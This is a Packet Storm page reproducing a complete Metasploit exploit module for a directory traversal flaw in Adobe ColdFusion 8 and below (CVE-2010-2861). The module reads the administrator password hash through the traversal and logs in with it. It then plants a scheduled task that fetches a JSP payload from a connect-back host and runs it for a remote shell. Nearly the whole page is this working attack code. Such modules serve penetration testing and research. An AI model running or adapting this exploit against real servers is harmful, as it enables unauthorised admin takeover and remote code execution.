what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe ColdFusion - Directory Traversal

Adobe ColdFusion - Directory Traversal
Posted Mar 16, 2011
Authored by webDEViL | Site metasploit.com

This Metasploit module exploits a directory traversal bug in Adobe ColdFusion. By reading the password.properties a user can login using the encrypted password itself. This should work on version 8 and below.

tags | exploit
advisories | CVE-2010-2861, OSVDB-67047
SHA-256 | 30d24479f36de7b6cb78e0669b676ca8ad8705ff92ec0b9d808502f823261cc0

Adobe ColdFusion - Directory Traversal

Change Mirror Download
##
# $Id: coldfusion_traversal.rb 11986 2011-03-16 10:15:54Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion - Directory Traversal',
'Description' => %q{
This module exploits a directory traversal bug in Adobe ColdFusion.
By reading the password.properties a user can login using the encrypted
password itself. This should work on version 8 and below.
},
'License' => MSF_LICENSE,
'Author' => [ 'webDEViL' ],
'Version' => '$Revision: 11986 $',
'References' =>
[
[ 'CVE', '2010-2861' ],
[ 'OSVDB', '67047' ],
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
],
'Privileged' => true,
'Platform' => ['linux','windows'],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' => 'java'
}
],
],

'DisclosureDate' => 'Aug 25 2010',
'DefaultTarget' => 0))

register_options(
[
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
OptString.new('URL', [ true, 'Administrator Directory', '/CFIDE/administrator/' ]),
OptString.new('CBIP', [ true, 'Connect Back IP (even when not using reverse shell)', nil ]),
OptString.new('TRAV', [ false, 'Location of the password.properties file eg. ../../../../ColdFusion8/lib/password.properties%00en', nil ]),
], self.class)

end

def exploit

ip = datastore['RHOST']
url = datastore['URL']+"enter.cfm"
locale = "?locale="
trav = datastore['TRAV'] || "../../../../../../../../../../../../../../../../../../../../../../lib/password.properties%00en"
datastore['JSP'] = "wD-"+rand_text_alphanumeric(6)+".jsp"
datastore['URIPATH'] = rand_text_alphanumeric(6)

print_status("Trying to acheive Directory Traversal...")
while trav.match(/..\//im)
res = send_request_raw({
'uri' => url+locale+trav,
'method' => 'GET',
'headers' =>
{
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
},
}, -1)

if (res.nil?)
print_error("no response for #{ip}:#{rport} #{url}")
elsif (res.code == 200)
#print_error("#{res.body}")#debug

if match = res.body.match(/([0-9A-F]{40})/im);
caphash = $1
print_status("URL: #{ip}#{url}?locale=#{trav}")
print_status("Admin Hash: " + caphash)
break
else
#select(nil, nil, nil, 3)
trav=trav[3..-1]
print_status("Trav:"+trav)

end

else
''
end
end

if caphash.nil?
print_error("Could not determine location of password.properties file, Set TRAV option manually")
print_error("OR ColdFusion is not vulnerable")
return
end

keyz = Time.now.to_i.to_s+"123"
print_status("Time: "+ keyz)
loghash= OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('sha1'), keyz, caphash).unpack('H*')[0].upcase
print_status("Login Hash: "+loghash)

params = 'cfadminPassword='+loghash
params << '&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F&'
params << 'salt='+keyz
params << '&submit=Login'

res = send_request_cgi({
'method' => 'POST',
'uri' => url,
'data' => params
})

if (res)
#print_status("Me want Cookie: "+ res.headers['Set-Cookie'])
if (res.headers['Set-Cookie'].match(/([A-Za-z0-9]{20,200})/im);)
session = $1
print_status("Cookie: #{session}")
else
print_error("Error retrieving cookie!")
end
else
print_error("No response received while logging in.")
end

print_status("Attempting to automatically detect the platform...")
##AUTO_DETECT START
path = datastore['URL'] + 'settings/mappings.cfm'
res = send_request_raw(
{
'uri' => path,
'headers' =>
{
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}"
}
}, 20)

if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end

if (res.body.match(/.*td *>(.*CFIDE&nbsp;)/im);)
os = $1
os.match(/<td [^>]*?>(.*)&nbsp/im);
os1 =$1
os1 = os1.gsub("\t", '')
os1 = os1.gsub("\r\n", '')

if (os1 =~ /:/i) #haha ;)
print_status('OS: Windows')
datastore['SHELL'] = 'cmd.exe'
os1=os1+"\\"
else #(os1 =~ /\//i)
print_status('OS: Linux')
datastore['SHELL'] = '/bin/sh'
os1=os1+"/"
end
print_status("Web Directory:"+os1)
end

##AUTO_DETECT END

res = send_request_raw(
{
'uri' => "/CFIDE/administrator/scheduler/scheduleedit.cfm?submit=Schedule+New+Task",
'method' => 'GET',
'headers' =>
{
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}",
}
}, 25)

if (res.body.match(/<input name="StartTimeOnce".*?value="(.*?)">/im);)
start_time = $1
end

if (res.body.match(/<input name="Start_Date".*?value="(.*?)" id="Start_Date">/im);)
start_date = $1
end
#else FAIL!
comb = start_date + start_time
fmt = "%b %d, %Y%I:%M %p"

comb = ((DateTime.strptime(comb,fmt)).advance :minutes =>-19)
t = comb.strftime("%b %d, %Y")
t1 = comb.strftime("%I:%M %p")
#t=(Time.now).strftime("%b %d, %Y") #can't use local time
#t1=(Time.now + 5).strftime("%I:%M:%S %p")
params = 'TaskName=wD-'+rand_text_alphanumeric(6)
params << "&Start_Date=#{t}" #Mar+12%2C+2011
params << '&End_Date=&ScheduleType=Once'
params << "&StartTimeOnce=#{t1}" #6%3A40+PM
params << ' &Interval=Daily&StartTimeDWM=&customInterval_hour=0&customInterval_min=0&customInterval_sec=0&CustomStartTime=&CustomEndTime=&Operation=HTTPRequest'
params << '&ScheduledURL=http%3A%2F%2F'+datastore['CBIP']+":"+datastore['SRVPORT']+"/"+datastore['URIPATH']
params << '&Username=&Password=&Request_Time_out=&proxy_server=&http_proxy_port=&publish=1'
params << '&publish_file='+os1+datastore['JSP']
params << '&adminsubmit=Submit&taskNameOrig='

res = send_request_raw(
{
'uri' => "/CFIDE/administrator/scheduler/scheduleedit.cfm",
'method' => 'POST',
'data' => params,
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => params.length,
'Cookie' => "CFAUTHORIZATION_cfadmin=#{session}",
}
}, 25)
#print_error("#{res.body}")
super
end

def on_request_uri(cli, request)
p = regenerate_payload(cli)
#print_status("SHELL set to #{datastore['SHELL']}")
#print_status((p.encoded).to_s)

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response(cli, p.encoded, { 'Content-Type' => 'text/html' })

res = send_request_raw(
{
'uri' => "/CFIDE/"+datastore['JSP'],
'method' => 'GET',
}, 25)
# Handle the payload
handler(cli)
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close